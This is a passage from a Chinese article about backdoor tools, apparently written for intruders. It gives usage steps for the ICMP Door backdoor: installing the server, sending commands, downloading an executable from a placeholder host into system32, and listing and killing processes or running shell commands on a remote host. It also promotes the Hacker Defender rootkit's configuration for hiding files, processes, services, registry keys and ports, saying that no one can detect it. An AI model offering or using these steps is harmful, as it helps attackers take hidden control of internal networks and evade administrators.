生效方式

　　这个后门其实危害最大的地方在于突破网关后对内网计算机的控制，ICMP Door能够帮助入侵者实现渗透内网。

　　首先使用icmpsrv.exe -install参数进行后门的安装，再使用icmpsend.exe IP进行控制，可以用：[http://xxx.xxx.xxx/admin.exe -

hkfx.exe]方式下载文件，保存在file://\\system32\]\\system32\目录下，文件名为hkfx.exe，程序名前的“-”不能省去，使用[pslist]可以列

出远程主机的进程名称和pid，使用[pskill id]可以杀进程了，同样，输入普通cmd命令，则远程主机也就执行了相关的命令。

　　这个后门是采用的c/s构架，必须要使用icmpsend才能激活服务器。
 
5.root kit

　　如果说上面的后门程序都各有千秋、各有所长的话，它们和经典的root kit 一比简直就是小巫见大巫了。

　　很多人有一个误解，他们认为root kit 是用作获得系统root访问权限的工具。实际上，root kit是攻击者用来隐蔽自己的踪迹和保留root访

问权限的工具。通常，攻击者通过远程攻击获得root访问权限，进入系统后，攻击者会在侵入的主机中安装root kit，然后他将经常通过root kit

的后门检查系统是否有其他的用户登录，如果只有自己，攻击者就开始着手清理日志中的有关信息。通过root kit的嗅探器获得其他系统的用户和

密码之后，攻击者就会利用这些信息侵入其他系统。

　　从unix系统上迁移到windows系统下的root kit完全沿袭了这些“可怕”的功能!现在网络上常见的root kit 是内核级后门软件，用户可以通

过它隐藏文件、进程、系统服、系统驱动、注册表键和键值、打开的端口以及虚构可用磁盘空间。程序同时也在内存中伪装它所做的改动，并且隐

身地控制被隐藏进程。程序安装隐藏后门，注册隐藏系统服务并且安装系统驱动。该后门技术允许植入reDirector，是非常难以查杀的一个东东，

让很多网络管员非常头疼!

　　hacker defender

　　类型：系统后门

　　使用范围：win200/xp/2003

　　隐蔽程度：★★★★★

　　使用难度：★★★★★

　　危害程度：★★★★★

　　查杀难度：★★★★★

    生效方式

　　现在最新版本的hxdf是1.0.0，它是从国外传过来的一个程序，包含两个关键程序，里面的配置文件ini非常复杂，相信新手使用也是很困难的

主要包括：[Hidden Table]，[Root Processes]，[HiddenServices]，[Hidden RegKeys]，[Hidden RegValues]，[Startup Run]，[Free

Space],[Hidden pORTS]，[Settings]。对功能就是隐藏文件(目录)、隐藏进程、隐蔽服务、隐藏注册键、隐藏注册表键值、启动程序、增加磁盘

剩余空间、隐藏端口、后门设置。

　　(1)可以实现正常系统TCP端口的通讯，比如80等，这个功能在高级后门并不鲜见。

　　(2)能得到简单的系统SHELL，对入侵的老手来说这就够了，多余的功能反而是累赘。

　　(3)隐藏端口，如果你非要使用TCP的某一个非常规端口通讯，那使用这个功能吧，放心，别人发现不了。

　　(4)隐藏后门的所有可找到东西!这个只能用一个字来形容：牛!比如隐藏文件、服务、注册表键等功能，虽然我们说起来是一句话，想念识货

的朋友应该能发现这中间NB的地方!

　　(5)史上最经典后门思维：配合其他扩展型后门使用，效果好得出乎你的意料!(这是后面的内容，我们马上讲到)。

　　抛开其他不讲，系统中安装了这样的root kit，你通过普通的查杀途径根本检测不到这个程序这点就非常值得我们利用了!试想：一个在你服

务器上运行的后门，你连看都看不到它，别说查杀了。

     以是上一些后门程序的全面分析及实例，对它们的生效方式、作用危害进行了列举，对于网络安全来说，永远都会存在入侵与反入侵这两方

阵营，在不断的斗争中促进网络技术的进步。

转截请注明:文章来自 pc捍卫者 http://www.pchwz.com 本站发布此文为传递更多信息之目的,不表明pc捍卫者赞同其观点